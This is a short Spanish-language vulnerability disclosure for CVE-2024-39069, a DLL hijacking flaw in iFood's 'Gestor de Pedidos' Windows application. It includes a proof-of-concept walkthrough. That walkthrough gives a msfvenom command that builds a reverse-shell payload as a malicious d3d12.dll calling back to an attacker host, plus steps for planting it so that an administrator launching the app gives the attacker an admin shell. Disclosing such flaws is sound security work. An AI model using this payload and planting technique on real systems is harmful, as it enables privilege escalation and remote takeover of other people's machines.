
CVE-2024-39069
Un atacante coloca una DLL maliciosa llamada "d3d12.dll" en un directorio que la aplicación busca antes de encontrar la DLL legítima "d3d12.dll". Cuando se ejecuta la aplicación, carga la DLL maliciosa en lugar de la legítima, permitiendo al atacante ejecutar código arbitrario en el contexto de la aplicación.
Página del proveedor: https://gestordepedidos.ifood.com.br/
Google Drive: https://drive.google.com/file/d/1p5SavlbLAE2o59l8jj4j-FkE_Ne_0Y-P/view?usp=sharing
Video de prueba de concepto: https://youtu.be/oMIobV2M0T8
Crear un archivo DLL malicioso en Kali Linux con msfvenom
msfvenom -p windows/x64/shell_revese_tcp LHOST=<IP> LPORT=<PORT> -f dll -o d3d12.dll
Transferir el 'd3d12.dll' creado al host Windows desde Kali con acceso de usuario de bajo nivel
Mover el archivo 'd3d12.dll' creado a 'C:\Gestor de Peddios\d3d12.dll' con acceso de usuario de bajo nivel
Cuando el administrador ejecute la aplicación, obtendrá una shell inversa como administrador